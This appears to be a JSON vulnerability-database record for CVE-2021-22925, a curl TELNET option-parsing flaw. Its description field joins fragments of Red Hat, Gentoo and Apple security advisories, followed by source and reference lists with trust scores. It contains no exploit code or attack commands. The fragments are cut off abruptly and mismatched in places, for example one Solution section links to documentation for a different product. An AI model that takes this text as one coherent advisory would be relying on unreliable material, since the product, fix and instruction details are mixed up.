"data": "curl supports the `-t` command line option, known as `CURLOPT_TELNETOPTIONS` in libcurl. This rarely used option is used to send variable=content pairs to TELNET servers. Due to a flaw in the option parser for sending `NEW_ENV` variables, libcurl could be made to pass on uninitialized data from a stack-based buffer to the server, potentially revealing sensitive internal information to the server over a clear-text network protocol. This could happen because curl did not call and use sscanf() correctly when parsing the string provided by the application. cURL contains a use-of-uninitialized-resource issue; information may be obtained. Summary:\n\nAn update is now available for OpenShift Logging 5.1. Solution:\n\nFor OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1944888 - CVE-2021-21409 netty: Request smuggling via content-length header\n2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data\n2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: curl: Multiple Vulnerabilities\n Date: December 19, 2022\n Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/curl \u003c 7.86.0 \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. 
\n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n 
https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. Description:\n\nGatekeeper Operator v0.2\n\nGatekeeper is an open source project that applies the OPA Constraint\nFramework to enforce policies on your Kubernetes clusters. \n\nThis advisory contains the container images for Gatekeeper that include\nsecurity updates, and container upgrades. For support options for any other use, see the Gatekeeper\nopen source project website at:\nhttps://open-policy-agent.github.io/gatekeeper/website/docs/howto/. \n\nSecurity updates:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThe requirements to apply the upgraded images are different whether or not\nyou\nused the operator. Complete the following steps, depending on your\ninstallation:\n\n- - Upgrade gatekeeper operator:\nThe gatekeeper operator that is installed by the gatekeeper operator policy\nhas\n`installPlanApproval` set to `Automatic`. 
This setting means the operator\nwill\nbe upgraded automatically when there is a new version of the operator. No\nfurther action is required for upgrade. If you changed the setting for\n`installPlanApproval` to `manual`, then you must view each cluster to\nmanually\napprove the upgrade to the operator. \n\n- - Upgrade gatekeeper without the operator:\nThe gatekeeper version is specified as part of the Gatekeeper CR in the\ngatekeeper operator policy. To upgrade the gatekeeper version:\na) Determine the latest version of gatekeeper by visiting:\nhttps://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. \nb) Click the tag dropdown, and find the latest static tag. An example tag\nis\n\u0027v3.3.0-1\u0027. \nc) Edit the gatekeeper operator policy and update the image tag to use the\nlatest static tag. For example, you might change this line to image:\n\u0027registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1\u0027. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2021-09-20-7 Additional information for \nAPPLE-SA-2021-09-13-3 macOS Big Sur 11.6\n\nmacOS Big Sur 11.6 addresses the following issues. \n\nCoreGraphics\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted PDF may lead to arbitrary\ncode execution. Apple is aware of a report that this issue may have\nbeen actively exploited. \nDescription: An integer overflow was addressed with improved input\nvalidation. \nCVE-2021-30860: The Citizen Lab\n\nCUPS\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A permissions issue existed. This issue was addressed\nwith improved permission validation. 
\nCVE-2021-30827: an anonymous researcher\nEntry added September 20, 2021\n\nCUPS\nAvailable for: macOS Big Sur\nImpact: A local user may be able to read arbitrary files as root\nDescription: This issue was addressed with improved checks. \nCVE-2021-30828: an anonymous researcher\nEntry added September 20, 2021\n\nCUPS\nAvailable for: macOS Big Sur\nImpact: A local user may be able to execute arbitrary files\nDescription: A URI parsing issue was addressed with improved parsing. \nCVE-2021-22925\nEntry added September 20, 2021\n\nCVMS\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2021-30832: Mickey Jin (@patch1t) of Trend Micro\nEntry added September 20, 2021\n\nFontParser\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted dfont file may lead to\narbitrary code execution\nDescription: This issue was addressed with improved checks. \nCVE-2021-30841: Xingwei Lin of Ant Security Light-Year Lab\nCVE-2021-30842: Xingwei Lin of Ant Security Light-Year Lab\nCVE-2021-30843: Xingwei Lin of Ant Security Light-Year Lab\nEntry added September 20, 2021\n\nGatekeeper\nAvailable for: macOS Big Sur\nImpact: A malicious application may bypass Gatekeeper checks\nDescription: This issue was addressed with improved checks. \nCVE-2021-30853: Gordon Long (@ethicalhax) of Box, Inc. \nEntry added September 20, 2021\n\nImageIO\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: This issue was addressed with improved checks. \nCVE-2021-30847: Mike Zhang of Pangu Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. 
\nCVE-2021-30830: Zweig of Kunlun Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2021-30865: Zweig of Kunlun Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A race condition was addressed with improved locking. \nCVE-2021-30857: Zweig of Kunlun Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A type confusion issue was addressed with improved state\nhandling. \nCVE-2021-30859: Apple\nEntry added September 20, 2021\n\nlibexpat\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause a denial of service\nDescription: This issue was addressed by updating expat to version\n2.4.1. \nCVE-2013-0340: an anonymous researcher\nEntry added September 20, 2021\n\nPreferences\nAvailable for: macOS Big Sur\nImpact: An application may be able to access restricted files\nDescription: A validation issue existed in the handling of symlinks. \nThis issue was addressed with improved validation of symlinks. \nCVE-2021-30855: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\nEntry added September 20, 2021\n\nSandbox\nAvailable for: macOS Big Sur\nImpact: A user may gain access to protected parts of the file system\nDescription: An access issue was addressed with improved access\nrestrictions. 
\nCVE-2021-30850: an anonymous researcher\nEntry added September 20, 2021\n\nSMB\nAvailable for: macOS Big Sur\nImpact: A local user may be able to read kernel memory\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2021-30845: Peter Nguyen Vu Hoang of STAR Labs\nEntry added September 20, 2021\n\nSMB\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to leak memory\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-30844: Peter Nguyen Vu Hoang of STAR Labs\nEntry added September 20, 2021\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution. Apple is aware of a report that this issue\nmay have been actively exploited. \nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2021-30858: an anonymous researcher\n\nAdditional recognition\n\nAPFS\nWe would like to acknowledge Koh M. Nakagawa of FFRI Security, Inc. \nfor their assistance. \nEntry added September 20, 2021\n\nApp Support\nWe would like to acknowledge @CodeColorist, an anonymous researcher\nfor their assistance. \nEntry added September 20, 2021\n\nCoreML\nWe would like to acknowledge hjy79425575 working with Trend Micro\nZero Day Initiative for their assistance. \nEntry added September 20, 2021\n\nCUPS\nWe would like to acknowledge an anonymous researcher for their\nassistance. \nEntry added September 20, 2021\n\nKernel\nWe would like to acknowledge Anthony Steinhauser of Google\u0027s Safeside\nproject for their assistance. \nEntry added September 20, 2021\n\nSandbox\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive\nSecurity for their assistance. \nEntry added September 20, 2021\n\nsmbx\nWe would like to acknowledge Zhongcheng Li (CK01) for their\nassistance. 
\nEntry added September 20, 2021\n\nInstallation note:\n\nThis update may be obtained from the Mac App Store or\nApple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmFI888ACgkQeC9qKD1p\nrhi/Bg/9GiqXl8sxPjDpATJqneZ1GcAxWxBZgkFrcLV/cMwrVqniWsOeVHqHjMSY\neJUkGehUtKsYE0g8Uk0qJqOUl3dxxGJpIDytOQJB3TFdd1BpZSK/tOChVem1JV1B\n+CMhqDnmR/u7bLqfCr1p6J5QJNHjTjgBA4RthdzZZ52pLGql7/2qfaJwpeHkheS4\n5EKmch8zh0CGRqrUTg1HgY67ierNsz47jIU6n7UeMwjskRU3xM9VqJ9s4eKGAtSv\n4Ry16pv0xUZ4cmL5EiLm2/eFbY8ByCji7jYPP0POBO4l518TGpaX2PaZBP9v0rrD\nt6cPEZHnsRaZ49OYak6z9iA8teKGSs6aCMuzSxExvlT8+YySf1o1nefbRH/tZMfn\nbwSO0ZyPsS9WYyuG/zX08U3CKOTkjqhLaOwVwte+cAeg2QS85aa9XPMG6PKcpyfu\nR7auxS92+Dg+R+97dAsI9TprSutCTw4iY8lyK9MVJSnh+zQSZEihUh4EaSufTHRC\nNlOSHvsTfXqsHaeed6sVKyX4ADHCUvRbCCIrqJKUs6waNd2T2XF7SzvgTSDJMHU9\n4AL/jpnltTjDJTtMO999VZKNzYurrGiHvBs5zHWr91+eaHW8YGdsDERsX3BFYLe3\n85i+Yge0iXlP7mT32cWxIw4AWDFITFiHnmV1/cdsCd2GIkqkhFw=\n=9bjT\n-----END PGP SIGNATURE-----\n\n\n\n. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ACS 3.67 security and enhancement update\nAdvisory ID: RHSA-2021:4902-01\nProduct: RHACS\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:4902\nIssue date: 2021-12-01\nCVE Names: CVE-2018-20673 CVE-2019-5827 CVE-2019-13750 \n CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 \n CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 \n CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 \n CVE-2020-16135 CVE-2020-24370 CVE-2020-27304 \n CVE-2021-3200 CVE-2021-3445 CVE-2021-3580 \n CVE-2021-3749 CVE-2021-3800 CVE-2021-3801 \n CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 \n CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 \n CVE-2021-23343 CVE-2021-23840 CVE-2021-23841 \n CVE-2021-27645 CVE-2021-28153 CVE-2021-29923 \n CVE-2021-32690 CVE-2021-33560 CVE-2021-33574 \n CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 \n CVE-2021-36086 CVE-2021-36087 CVE-2021-39293 \n=====================================================================\n\n1. Summary:\n\nUpdated images are now available for Red Hat Advanced Cluster Security for\nKubernetes (RHACS). \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nThe release of RHACS 3.67 provides the following new features, bug fixes,\nsecurity patches and system changes:\n\nOpenShift Dedicated support\n\nRHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on\nAmazon Web Services and Google Cloud Platform. \n\n1. Use OpenShift OAuth server as an identity provider\nIf you are using RHACS with OpenShift, you can now configure the built-in\nOpenShift OAuth server as an identity provider for RHACS. \n\n2. 
Enhancements for CI outputs\nRed Hat has improved the usability of RHACS CI integrations. CI outputs now\nshow additional detailed information about the vulnerabilities and the\nsecurity policies responsible for broken builds. \n\n3. Runtime Class policy criteria\nUsers can now use RHACS to define the container runtime configuration that\nmay be used to run a pod\u2019s containers using the Runtime Class policy\ncriteria. \n\nSecurity Fix(es):\n\n* civetweb: directory traversal when using the built-in example HTTP\nform-based file upload mechanism via the mg_handle_form_request API\n(CVE-2020-27304)\n\n* nodejs-axios: Regular expression denial of service in trim function\n(CVE-2021-3749)\n\n* nodejs-prismjs: ReDoS vulnerability (CVE-2021-3801)\n\n* golang: net: incorrect parsing of extraneous zero characters at the\nbeginning of an IP address octet (CVE-2021-29923)\n\n* helm: information disclosure vulnerability (CVE-2021-32690)\n\n* golang: archive/zip: malformed archive may cause panic or memory\nexhaustion (incomplete fix of CVE-2021-33196) (CVE-2021-39293)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n(CVE-2021-23343)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fixes\nThe release of RHACS 3.67 includes the following bug fixes:\n\n1. Previously, when using RHACS with the Compliance Operator integration,\nRHACS did not respect or populate Compliance Operator TailoredProfiles. \nThis has been fixed. \n\n2. Previously, the Alpine Linux package manager (APK) in Image policy\nlooked for the presence of apk package in the image rather than the\napk-tools package. This issue has been fixed. \n\nSystem changes\nThe release of RHACS 3.67 includes the following system changes:\n\n1. Scanner now identifies vulnerabilities in Ubuntu 21.10 images. \n2. 
The Port exposure method policy criteria now include route as an\nexposure method. \n3. The OpenShift: Kubeadmin Secret Accessed security policy now allows the\nOpenShift Compliance Operator to check for the existence of the Kubeadmin\nsecret without creating a violation. \n4. The OpenShift Compliance Operator integration now supports using\nTailoredProfiles. \n5. The RHACS Jenkins plugin now provides additional security information. \n6. When you enable the environment variable ROX_NETWORK_ACCESS_LOG for\nCentral, the logs contain the Request URI and X-Forwarded-For header\nvalues. \n7. The default uid:gid pair for the Scanner image is now 65534:65534. \n8. RHACS adds a new default Scope Manager role that includes minimum\npermissions to create and modify access scopes. \n9. If microdnf is part of an image or shows up in process execution, RHACS\nreports it as a security violation for the Red Hat Package Manager in Image\nor the Red Hat Package Manager Execution security policies. \n10. In addition to manually uploading vulnerability definitions in offline\nmode, you can now upload definitions in online mode. \n11. You can now format the output of the following roxctl CLI commands in\ntable, csv, or JSON format: image scan, image check \u0026 deployment check\n12. You can now use a regular expression for the deployment name while\nspecifying policy exclusions\n\n3. Solution:\n\nTo take advantage of these new features, fixes and changes, please upgrade\nRed Hat Advanced Cluster Security for Kubernetes to version 3.67. \n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n1978144 - CVE-2021-32690 helm: information disclosure vulnerability\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function\n2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability\n2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)\n2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nRHACS-65 - Release RHACS 3.67.0\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-20673\nhttps://access.redhat.com/security/cve/CVE-2019-5827\nhttps://access.redhat.com/security/cve/CVE-2019-13750\nhttps://access.redhat.com/security/cve/CVE-2019-13751\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-19603\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-12762\nhttps://access.redhat.com/security/cve/CVE-2020-13435\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-16135\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2020-27304\nhttps://access.redhat.com/security/cve/CVE-2021-3200\nhttps://access.redhat.com/security/cve/CVE-2021-3445\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3749\nhttps://access.redhat.com/security/cve/CVE-2021-3800\nhttps:
//access.redhat.com/security/cve/CVE-2021-3801\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-20266\nhttps://access.redhat.com/security/cve/CVE-2021-22876\nhttps://access.redhat.com/security/cve/CVE-2021-22898\nhttps://access.redhat.com/security/cve/CVE-2021-22925\nhttps://access.redhat.com/security/cve/CVE-2021-23343\nhttps://access.redhat.com/security/cve/CVE-2021-23840\nhttps://access.redhat.com/security/cve/CVE-2021-23841\nhttps://access.redhat.com/security/cve/CVE-2021-27645\nhttps://access.redhat.com/security/cve/CVE-2021-28153\nhttps://access.redhat.com/security/cve/CVE-2021-29923\nhttps://access.redhat.com/security/cve/CVE-2021-32690\nhttps://access.redhat.com/security/cve/CVE-2021-33560\nhttps://access.redhat.com/security/cve/CVE-2021-33574\nhttps://access.redhat.com/security/cve/CVE-2021-35942\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-39293\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYafeGdzjgjWX9erEAQgZ8Q/9H5ov4ZfKZszdJu0WvRMetEt6DMU2RTZr\nKjv4h4FnmsMDYYDocnkFvsRjcpdGxtoUShAqD6+FrTNXjPtA/v1tsQTJzhg4o50w\ntKa9T4aHfrYXjGvWgQXJJEGmGaYMYePUOv77x6pLfMB+FmgfOtb8kzOdNzAtqX3e\nlq8b2DrQuPSRiWkUgFM2hmS7OtUsqTIShqWu67HJdOY74qDN4DGp7GnG6inCrUjV\nx4/4X5Fb7JrAYiy57C5eZwYW61HmrG7YHk9SZTRYgRW0rfgLncVsny4lX1871Ch2\ne8ttu0EJFM1EJyuCJwJd1Q+rhua6S1VSY+etLUuaYme5DtvozLXQTLUK31qAq/hK\nqnLYQjaSieea9j1dV6YNHjnvV0XGczyZYwzmys/CNVUxwvSHr1AJGmQ3zDeOt7Qz\nvguWmPzyiob3RtHjfUlUpPYeI6HVug801YK6FAoB9F2BW2uHVgbtKOwG5pl5urJt\nG4taizPtH8uJj5hem5nHnSE1sVGTiStb4+oj2LQonRkgLQ2h7tsX8Z8yWM/3TwUT\nPTBX9AIHwt8aCx7XxTeEIs0H9B1T9jYfy06o9H2547un9sBoT0Sm7fqKuJKic8N/\npJ2kXBiVJ9B4G+JjWe8rh1oC1yz5Q5/5HZ19VYBjHhYEhX4s9s2YsF1L1uMoT3NN\nT0pPNmsPGZY=\n=ux5P\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. \n\nSecurity Fix(es):\n\n* nodejs-immer: prototype pollution may lead to DoS or remote code\nexecution (CVE-2021-3757)\n\n* mig-controller: incorrect namespaces handling may lead to not authorized\nusage of Migration Toolkit for Containers (MTC) (CVE-2021-3948)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor details on how to install and use MTC, refer to:\n\nhttps://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html\n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution\n2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport)\n2006842 - MigCluster CR remains in \"unready\" state and source registry is inaccessible after temporary shutdown of source cluster\n2007429 - \"oc describe\" and \"oc log\" commands on \"Migration resources\" tree cannot be copied after failed migration\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n\n5. Solution:\n\nSee the Red Hat OpenShift Container Platform 4.6 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index\nSee the Red Hat OpenShift Container Platform 4.7 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index\nSee the Red Hat OpenShift Container Platform 4.8 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index\nSee the Red Hat OpenShift Container Platform 4.9 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index\n\n4",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22925"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "VULHUB",
"id": "VHN-381399"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "164249"
},
{
"db": "PACKETSTORM",
"id": "164246"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165862"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-22925",
"trust": 3.6
},
{
"db": "HACKERONE",
"id": "1223882",
"trust": 1.9
},
{
"db": "SIEMENS",
"id": "SSA-389290",
"trust": 1.1
},
{
"db": "SIEMENS",
"id": "SSA-484086",
"trust": 1.1
},
{
"db": "JVN",
"id": "JVNVU91709091",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU99030761",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-22-069-09",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165862",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165099",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "166489",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165129",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165096",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165135",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165209",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166051",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166308",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165633",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165002",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164886",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165758",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166309",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-381399",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165286",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165287",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164249",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164246",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381399"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "164249"
},
{
"db": "PACKETSTORM",
"id": "164246"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
